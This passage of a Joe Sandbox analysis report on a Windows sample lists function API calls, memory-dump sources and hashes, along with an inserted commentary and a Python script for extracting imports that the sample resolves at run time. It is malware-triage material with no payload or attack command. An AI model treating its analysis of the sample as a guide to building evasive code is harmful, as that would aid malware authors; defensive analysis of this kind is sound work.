                                                                  • GetProcAddress.KERNEL32(00000000,EnumDisplayMonitors), ref: 0040507B
                                                                  • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 0040508C
                                                                  • GetProcAddress.KERNEL32(00000000,EnumDisplayDevicesA), ref: 0040509D
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                   • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                   • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmp
                                                                   • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmp
                                                                   • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmp
                                                                   • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: AddressProc$HandleModule
                                                                  • String ID: EnumDisplayDevicesA$EnumDisplayMonitors$GetMonitorInfoA$GetSystemMetrics$MonitorFromPoint$MonitorFromRect$MonitorFromWindow$USER32$`#vp,$v
                                                                  • API String ID: 667068680-2614843311
                                                                  • Opcode ID: 5547913a3e14e16a07a1123cd0d9303ef4187e5ce9ad497fcc0af7a3a5c74f0c
                                                                  • Instruction ID: a51757c319cfb8603869d02164866bf9d90346e9d9b4ab7557ddca89ad350173
                                                                  • Opcode Fuzzy Hash: 5547913a3e14e16a07a1123cd0d9303ef4187e5ce9ad497fcc0af7a3a5c74f0c
                                                                  • Instruction Fuzzy Hash: AD215E74A026179AE321AF27BDC452EBAF4F6487403E4543FD404E22D0D73954868F9E
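The function entries in this listing show the sample resolving imports at run time through GetModuleHandleA/GetProcAddress pairs (the UI-language helpers from kernel32.dll above, and the multi-monitor helpers from USER32 here), which is what the "Contains functionality to dynamically determine API calls" signature reports. When triaging a long listing like this one it helps to pull those run-time-resolved names out mechanically rather than reading every entry. The following Python is an added example written for this page, not code from the Joe Sandbox report or from Joe Security: it parses the report's own "APIs" entry format (the sample text is copied verbatim from the entries above, bullets included, and is not a new capture), splits the listing into one call list per function, and pairs each GetProcAddress name with the module named in the most recent GetModuleHandleA call. That pairing by call order is my heuristic, since the listing shows the handle argument as 00000000 or ?; the entry at 00428019 also lists ntdll.dll among its strings, so a second module lookup that the listing does not show would be mis-attributed by it.

```python
import re
from dataclasses import dataclass
from typing import Optional

# Sample input: "APIs" entries copied from the Joe Sandbox function listing on this page
# (not a new capture; the lines are the report's own, with the "Strings" and
# "Memory Dump Source" headers that terminate each entry).
REPORT_LINES = r"""
APIs
• GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00428019
• GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 00428024
• ConvertDefaultLocale.KERNEL32(?), ref: 00428055
• GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 0042806A
• GetVersion.KERNEL32 ref: 00428098
• RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 004280BD
Strings
Memory Dump Source
• Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
APIs
  • Part of subcall function 00429CA6: __EH_prolog.LIBCMT ref: 00429CAB
• CallNextHookEx.USER32(?,00000003,?,?), ref: 00422E85
• lstrcmpiA.KERNEL32(?,ime), ref: 00422F05
• SetWindowLongA.USER32(?,000000FC,Function_0002242E), ref: 00422F3F
Strings
APIs
• GetModuleHandleA.KERNEL32(USER32,?,?,?,00405143), ref: 0040501B
• GetProcAddress.KERNEL32(00000000,GetSystemMetrics), ref: 00405037
• GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 00405048
Strings
"""

# One API call line: Name.MODULE(args), ref: ADDRESS
# The argument list and the comma are optional ("GetVersion.KERNEL32 ref: 00428098").
API_RE = re.compile(
    r"^(?P<name>\w+)\.(?P<module>\w+)(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})$"
)
SUBCALL_PREFIX = "Part of subcall function "
ENTRY_END = {"Strings", "Memory Dump Source"}


@dataclass
class ApiCall:
    name: str
    module: str
    args: list[str]
    ref: int                          # call-site address from the "ref:" field
    subcall_of: Optional[int] = None  # set when the report attributes the call to a callee


def parse_api_entries(text: str) -> list[list[ApiCall]]:
    """Split the listing into one list of ApiCall per 'APIs' header."""
    entries: list[list[ApiCall]] = []
    current: Optional[list[ApiCall]] = None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            current = []
            entries.append(current)
            continue
        if current is None:
            continue
        if line in ENTRY_END:
            current = None
            continue
        line = line.lstrip("•").strip()
        subcall_of = None
        if line.startswith(SUBCALL_PREFIX):
            func, _, line = line[len(SUBCALL_PREFIX):].partition(": ")
            subcall_of = int(func, 16)
        m = API_RE.match(line)
        if not m:
            continue  # stray report text, not an API line
        args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
        current.append(ApiCall(m["name"], m["module"], args, int(m["ref"], 16), subcall_of))
    return entries


def resolved_imports(calls: list[ApiCall]) -> list[tuple[Optional[str], str]]:
    """Names passed to GetProcAddress, paired with the module named by the most recent
    GetModuleHandleA call. Pairing by call order is a heuristic (my assumption), since
    the listing shows the handle argument only as 00000000 or '?'."""
    module: Optional[str] = None
    found: list[tuple[Optional[str], str]] = []
    for c in calls:
        if c.name == "GetModuleHandleA" and c.args:
            module = c.args[0]
        elif c.name == "GetProcAddress" and len(c.args) >= 2:
            found.append((module, c.args[1]))
    return found


def direct_calls_by_module(entries: list[list[ApiCall]]) -> dict[str, int]:
    """Count of listed (statically imported) API calls per module across all functions."""
    counts: dict[str, int] = {}
    for calls in entries:
        for c in calls:
            counts[c.module] = counts.get(c.module, 0) + 1
    return counts


if __name__ == "__main__":
    parsed = parse_api_entries(REPORT_LINES)
    for i, calls in enumerate(parsed):
        print(f"function #{i}: {len(calls)} calls, resolved at run time: {resolved_imports(calls)}")
    print(direct_calls_by_module(parsed))
```

Run it on the full "APIs" section of a report saved as text and the functions with a non-empty resolved-import list are the ones to open first in the dumps; entries whose strings name AfxOldWndProc423 or Microsoft Visual C++ Runtime Library, as in this part of the listing, are statically linked MFC and CRT support code rather than the sample's own logic.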
                                                                  APIs
                                                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,00000000,00000000), ref: 004124A2
                                                                  • _strcat.LIBCMT ref: 004124B5
                                                                  • _strlen.LIBCMT ref: 004124C2
                                                                  • _strlen.LIBCMT ref: 004124D1
                                                                  • _strncpy.LIBCMT ref: 004124E8
                                                                  • _strlen.LIBCMT ref: 004124F1
                                                                  • _strlen.LIBCMT ref: 004124FE
                                                                  • _strcat.LIBCMT ref: 0041251C
                                                                  • _strlen.LIBCMT ref: 00412564
                                                                  • GetStdHandle.KERNEL32(000000F4,00431F70,00000000,?,00000000,00000000,00000000,00000000), ref: 0041256F
                                                                  • WriteFile.KERNEL32(00000000), ref: 00412576
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                   • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                   • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmp
                                                                   • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmp
                                                                   • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmp
                                                                   • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: _strlen$File_strcat$HandleModuleNameWrite_strncpy
                                                                  • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                                                                  • API String ID: 3601721357-4022980321
                                                                  • Opcode ID: 33eba8a56c94104930c01ea856345e6cd8f8d6e67629feebce46de6d582aadf8
                                                                  • Instruction ID: 13021548b91ef27835def0d839a72f5b902c9013898fcf24966e2a0fbd176725
                                                                  • Opcode Fuzzy Hash: 33eba8a56c94104930c01ea856345e6cd8f8d6e67629feebce46de6d582aadf8
                                                                  • Instruction Fuzzy Hash: 1B317B72640114ABDB24ABB9DCC1FEB3369EB44318F10082FF555E3192DE7CA4A5872C
                                                                  APIs
                                                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104,004321C0,00000118,0040EA00,00000001,00000000,00431A80,00000008,0041258D,00000000,00000000,00000000), ref: 00412EF6
                                                                  • _strcat.LIBCMT ref: 00412F0C
                                                                  • _strlen.LIBCMT ref: 00412F1C
                                                                  • _strlen.LIBCMT ref: 00412F2D
                                                                  • _strncpy.LIBCMT ref: 00412F47
                                                                  • _strlen.LIBCMT ref: 00412F50
                                                                  • _strcat.LIBCMT ref: 00412F6C
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                   • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                   • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmp
                                                                   • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmp
                                                                   • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmp
                                                                   • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: _strlen$_strcat$FileModuleName_strncpy
                                                                  • String ID: ( C$...$<program name unknown>$Buffer overrun detected!$Microsoft Visual C++ Runtime Library$Program: $Unknown security failure detected!
                                                                  • API String ID: 3058806289-1906809315
                                                                  • Opcode ID: 54b1497dfd563ac8debf3ed2c16c48730149fe1c51b89dfeef04513612d6689f
                                                                  • Instruction ID: dc0b60b2e2fa07aa48be410cc1825f31972f92912820f319277543dbe6ba90b6
                                                                  • Opcode Fuzzy Hash: 54b1497dfd563ac8debf3ed2c16c48730149fe1c51b89dfeef04513612d6689f
                                                                  • Instruction Fuzzy Hash: 2931EC719012146BDB11AB61AD82ECE3668DF0A324F10046FF114F72D2DBBCDA954BAD
                                                                  APIs
                                                                  • GetModuleHandleA.KERNEL32(kernel32.dll,76230A60,00000000,0040E8F2,?,00431A70,00000060), ref: 00411F75
                                                                  • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00411F8D
                                                                  • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00411F9A
                                                                  • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00411FA7
                                                                  • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00411FB4
                                                                  • FlsAlloc.KERNEL32(00411E16,?,00431A70,00000060), ref: 00411FF1
                                                                  • FlsSetValue.KERNEL32(00000000,?,00431A70,00000060), ref: 0041201E
                                                                  • GetCurrentThreadId.KERNEL32 ref: 00412032
                                                                    • Part of subcall function 00411D88: FlsFree.KERNEL32(00000006,00412047,?,00431A70,00000060), ref: 00411D93
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: AddressProc$AllocCurrentFreeHandleModuleThreadValue
                                                                  • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$`#vp,$v$kernel32.dll
                                                                  • API String ID: 2355849793-3083462466
                                                                  • Opcode ID: 87445edb743fa6b159021db6ff6499874027bb5d5b45ed15fee1da4cd6f863fa
                                                                  • Instruction ID: 94756841155c4855af9acbccb37cf424809e5c19bd57a04feacf727f30d0ec92
                                                                  • Opcode Fuzzy Hash: 87445edb743fa6b159021db6ff6499874027bb5d5b45ed15fee1da4cd6f863fa
                                                                  • Instruction Fuzzy Hash: 8E219270E01B109BD7209F36AC0AE567EE4EB94761710523BF400C22B0EB789887CF5C
                                                                  APIs
                                                                  • __EH_prolog.LIBCMT ref: 0040D240
                                                                  • GetFocus.USER32 ref: 0040D269
                                                                  • GetParent.USER32(?), ref: 0040D2BE
                                                                  • GetParent.USER32(?), ref: 0040D2CE
                                                                  • GetKeyState.USER32(00000012), ref: 0040D386
                                                                  • IsDialogMessageA.USER32(?,?,?,?,?,00000000), ref: 0040D435
                                                                  • GetFocus.USER32 ref: 0040D447
                                                                  • GetFocus.USER32 ref: 0040D454
                                                                    • Part of subcall function 004043DD: GetNextDlgTabItem.USER32(?,?,?), ref: 004043F0
                                                                  • IsWindow.USER32(?), ref: 0040D46C
                                                                  • GetFocus.USER32 ref: 0040D478
                                                                  • IsWindow.USER32(?), ref: 0040D48E
                                                                  • GetFocus.USER32 ref: 0040D494
                                                                  • GetKeyState.USER32(00000010), ref: 0040D4C5
                                                                  • MessageBeep.USER32(00000000), ref: 0040D5BC
                                                                  • SendMessageA.USER32(?,000000F1,00000001,00000000), ref: 0040D6A3
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: Focus$Message$ParentStateWindow$BeepDialogH_prologItemNextSend
                                                                  • String ID:
                                                                  • API String ID: 2999224188-0
                                                                  • Opcode ID: 3f0161c52a8131cff4d874affb24284938a97bd9b6013c2c61ed968d9b0ac3a0
                                                                  • Instruction ID: 35367725a961e0762c2cabb331062711e07683ca912c259f6d9a903d8a3fc05f
                                                                  • Opcode Fuzzy Hash: 3f0161c52a8131cff4d874affb24284938a97bd9b6013c2c61ed968d9b0ac3a0
                                                                  • Instruction Fuzzy Hash: 07C19030E002159BDF20AFA5C885ABFBBB5AF54354F54443BE805B72D1C73DAC89CA5A
                                                                  APIs
                                                                  • LoadLibraryA.KERNEL32(user32.dll,00431FC0,?,?), ref: 00416BBB
                                                                  • GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 00416BD7
                                                                  • GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 00416BE8
                                                                  • GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 00416BF5
                                                                  • GetProcAddress.KERNEL32(00000000,GetUserObjectInformationA), ref: 00416C0B
                                                                  • GetProcAddress.KERNEL32(00000000,GetProcessWindowStation), ref: 00416C1C
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: AddressProc$LibraryLoad
                                                                  • String ID: GetActiveWindow$GetLastActivePopup$GetProcessWindowStation$GetUserObjectInformationA$MessageBoxA$user32.dll
                                                                  • API String ID: 2238633743-1612076079
                                                                  • Opcode ID: 9e327152f9d207da8eb992561a812df92acea30e061754a633c313ec85e84a5e
                                                                  • Instruction ID: 84e52e513d7d4be0df6fc3aa4f30dfd75f48eeac0b79a234e46bab85f2138aa6
                                                                  • Opcode Fuzzy Hash: 9e327152f9d207da8eb992561a812df92acea30e061754a633c313ec85e84a5e
                                                                  • Instruction Fuzzy Hash: CA21A7B1A00306ABDB249F659E85FBB3BECDB48740B15103AE945C2250F778D984D7AD
                                                                  APIs
                                                                  • __EH_prolog.LIBCMT ref: 0042B96E
                                                                  • lstrlenA.KERNEL32(?,?,?), ref: 0042B9A8
                                                                  • VariantClear.OLEAUT32(?), ref: 0042BC3B
                                                                  • VariantClear.OLEAUT32(?), ref: 0042BC62
                                                                  • SysFreeString.OLEAUT32(?), ref: 0042BCC6
                                                                  • SysFreeString.OLEAUT32(?), ref: 0042BCDB
                                                                  • SysFreeString.OLEAUT32(?), ref: 0042BCF0
                                                                  • VariantChangeType.OLEAUT32(?,?,00000000,?), ref: 0042BD28
                                                                  • VariantClear.OLEAUT32(?), ref: 0042BD38
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: Variant$ClearFreeString$ChangeH_prologTypelstrlen
                                                                  • String ID:
                                                                  • API String ID: 344392101-0
                                                                  • Opcode ID: 089186b2475cb69903ae3bdd73d4d94893396a00b302e6d1bc5308c4256f1ad2
                                                                  • Instruction ID: 7c280d155deaacb0d062ce9fde7c5bc633f2178c496f6d30549a061dd8c1b599
                                                                  • Opcode Fuzzy Hash: 089186b2475cb69903ae3bdd73d4d94893396a00b302e6d1bc5308c4256f1ad2
                                                                  • Instruction Fuzzy Hash: 59E1AE71A00219DFDF10DFA9E880AEEBBB5FF05300F54442AE951A7250D738AD52CFA9
                                                                  APIs
                                                                    • Part of subcall function 00423CEB: GetWindowLongA.USER32(?,000000F0), ref: 00423CF6
                                                                  • GetParent.USER32(?), ref: 00421696
                                                                  • SendMessageA.USER32(00000000,0000036B,00000000,00000000), ref: 004216B9
                                                                  • GetWindowRect.USER32(?,?), ref: 004216D2
                                                                  • GetWindowLongA.USER32(00000000,000000F0), ref: 004216E5
                                                                  • CopyRect.USER32(?,?), ref: 00421732
                                                                  • CopyRect.USER32(?,?), ref: 0042173C
                                                                  • GetWindowRect.USER32(00000000,?), ref: 00421745
                                                                  • CopyRect.USER32(?,?), ref: 00421761
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: Rect$Window$Copy$Long$MessageParentSend
                                                                  • String ID:
                                                                  • API String ID: 808654186-0
                                                                  • Opcode ID: 543d3be195253b833f47fdbe98b0e5ceab59b1d8d68aa360d95ee6028cc7d4e0
                                                                  • Instruction ID: ef626137246b3df9443168ea5854a1867bc10e0d27b41f31f247ff74b2751243
                                                                  • Opcode Fuzzy Hash: 543d3be195253b833f47fdbe98b0e5ceab59b1d8d68aa360d95ee6028cc7d4e0
                                                                  • Instruction Fuzzy Hash: CB518471B00219AFDB10DBA9DD85FEEBBB9AF94314F590126F501F3290D638E9068B58
                                                                  APIs
                                                                  • LCMapStringW.KERNEL32(00000000,00000100,004322C4,00000001,00000000,00000000,004322C8,00000038,0040FB6E,00000100,00000020,00000100,?,00000100,00000000,00000001), ref: 00415239
                                                                  • GetLastError.KERNEL32 ref: 0041524B
                                                                  • MultiByteToWideChar.KERNEL32(?,00000000,0040FE1B,?,00000000,00000000,004322C8,00000038,0040FB6E,00000100,00000020,00000100,?,00000100,00000000,00000001), ref: 004152D2
                                                                  • MultiByteToWideChar.KERNEL32(?,00000001,0040FE1B,?,?,00000000), ref: 00415353
                                                                  • LCMapStringW.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 0041536D
                                                                  • LCMapStringW.KERNEL32(00000000,00000000,?,00000000,?,?), ref: 004153A8
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: String$ByteCharMultiWide$ErrorLast
                                                                  • String ID:
                                                                  • API String ID: 1775797328-0
                                                                  • Opcode ID: 144a4794a36e381682c1608e6ad5055cd70a4332a4d33170656413dfc46b285a
                                                                  • Instruction ID: 5d6a1a971d9631bc273ea7c0213d5fa4ae4f756ba9487c2342617ad8996632df
                                                                  • Opcode Fuzzy Hash: 144a4794a36e381682c1608e6ad5055cd70a4332a4d33170656413dfc46b285a
                                                                  • Instruction Fuzzy Hash: 26B1AD72800509EFCF119FA1DC859EE7BB6FF48318F14452AF911A22A0D33989A1DF69
                                                                  APIs
                                                                  • __EH_prolog.LIBCMT ref: 00420573
                                                                  • FindResourceA.KERNEL32(?,00000000,00000005), ref: 004205AB
                                                                  • LoadResource.KERNEL32(?,00000000,?,?,?,?,?,?,?,00000064,00000000), ref: 004205B3
                                                                    • Part of subcall function 00421E24: UnhookWindowsHookEx.USER32(?), ref: 00421E49
                                                                  • LockResource.KERNEL32(00000000,?,?,?,?,?,?,?,00000064,00000000), ref: 004205C5
                                                                  • GetDesktopWindow.USER32 ref: 004205F2
                                                                  • IsWindowEnabled.USER32(00000000), ref: 00420600
                                                                  • EnableWindow.USER32(00000000,00000000), ref: 0042060F
                                                                  • EnableWindow.USER32(00000000,00000001), ref: 0042069E
                                                                  • GetActiveWindow.USER32 ref: 004206A9
                                                                  • SetActiveWindow.USER32(00000000,?,?,?,?,?,?,?,?,00000064,00000000), ref: 004206B7
                                                                  • FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000064,00000000), ref: 004206D3
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: Window$Resource$ActiveEnable$DesktopEnabledFindFreeH_prologHookLoadLockUnhookWindows
                                                                  • String ID:
                                                                  • API String ID: 833315621-0
                                                                  • Opcode ID: 9c049424f7e73ca1598ba7117b6125b43015b5989c775a291803d269f1ce4c2f
                                                                  • Instruction ID: dca9b540c62fcd184cdbaef0817d1578ed90b02519734c6228dfb65e1cce7a9d
                                                                  • Opcode Fuzzy Hash: 9c049424f7e73ca1598ba7117b6125b43015b5989c775a291803d269f1ce4c2f
                                                                  • Instruction Fuzzy Hash: 79418331B00325DFDB21AFA5E84976EBBF5AF44715F90042EE501B2292CB785942CA6D
                                                                  APIs
                                                                  • GetVersionExA.KERNEL32(?,00431A70,00000060), ref: 0040E832
                                                                  • GetModuleHandleA.KERNEL32(00000000,?,00431A70,00000060), ref: 0040E885
                                                                  • _fast_error_exit.LIBCMT ref: 0040E8E7
                                                                  • _fast_error_exit.LIBCMT ref: 0040E8F8
                                                                  • GetCommandLineA.KERNEL32(?,00431A70,00000060), ref: 0040E917
                                                                  • GetStartupInfoA.KERNEL32(?), ref: 0040E96B
                                                                  • __wincmdln.LIBCMT ref: 0040E971
                                                                  • GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 0040E98E
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: HandleModule_fast_error_exit$CommandInfoLineStartupVersion__wincmdln
                                                                  • String ID: `#vp,$v
                                                                  • API String ID: 3897392166-4109723868
                                                                  • Opcode ID: e1bf0c6c10a35e2feaa378b61d2a2dbd1c9d61abde69f1a15ddcab38a1182d4c
                                                                  • Instruction ID: 0bc8d0c747b5be90a239dc1f6fd12c79bdb3a1e517c7b53da2822559ab0157a6
                                                                  • Opcode Fuzzy Hash: e1bf0c6c10a35e2feaa378b61d2a2dbd1c9d61abde69f1a15ddcab38a1182d4c
                                                                  • Instruction Fuzzy Hash: E241B0B1D002109ADB20BF739D456AE77B0AF44718F24883FE415FB2D2DA7C88928B5D
                                                                  APIs
                                                                  • __EH_prolog.LIBCMT ref: 00422CFD
                                                                  • GetPropA.USER32(?,AfxOldWndProc423), ref: 00422D15
                                                                  • CallWindowProcA.USER32(?,?,00000110,?,00000000), ref: 00422D73
                                                                    • Part of subcall function 004222C8: GetWindowRect.USER32(?,004223EA), ref: 004222ED
                                                                    • Part of subcall function 004222C8: GetWindow.USER32(?,00000004), ref: 0042230A
                                                                  • SetWindowLongA.USER32(?,000000FC,?), ref: 00422DA3
                                                                  • RemovePropA.USER32(?,AfxOldWndProc423), ref: 00422DAB
                                                                  • GlobalFindAtomA.KERNEL32(AfxOldWndProc423), ref: 00422DB2
                                                                  • GlobalDeleteAtom.KERNEL32(00000000), ref: 00422DB9
                                                                    • Part of subcall function 00421338: GetWindowRect.USER32(?,?), ref: 00421344
                                                                  • CallWindowProcA.USER32(?,?,?,?,00000000), ref: 00422E0D
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
